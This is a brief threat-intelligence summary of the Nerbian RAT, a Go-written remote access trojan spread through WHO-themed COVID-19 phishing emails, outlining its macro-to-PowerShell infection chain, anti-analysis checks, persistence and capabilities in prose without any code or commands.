A new Remote Access Trojan (RAT) was discovered being delivered via phishing campaigns that impersonate the World Health Organization (WHO) sending the target COVID-19 related information. This RAT, dubbed Nerbian RAT, is written in Go and includes a large number of anti-analysis mechanisms to help prevent it from being run in a sandboxed or virtualized environment.
The phishing emails seen from this campaign have included a Microsoft Word document, either directly attached or within an attached RAR file. These Word documents contain malicious macros that, when executed, drop a batch file onto the device and runs it. This batch file contains a PowerShell command that downloads an executable file and executes it. This executable file is packed with the UPX utility and functions as the dropper for the main Nerbian RAT payload. This dropper is what contains the large set of anti-analysis checks, including things like checking for certain reverse engineering or debugging programs running, suspicious MAC addresses, small hard disk sizes, and so on.
The dropper then downloads the main Nerbian RAT payload and creates a scheduled task to establish persistence, executing the main payload hourly. Nerbian RAT contains functionality similar to other RATs, including command execution, keylogging, and screen capturing.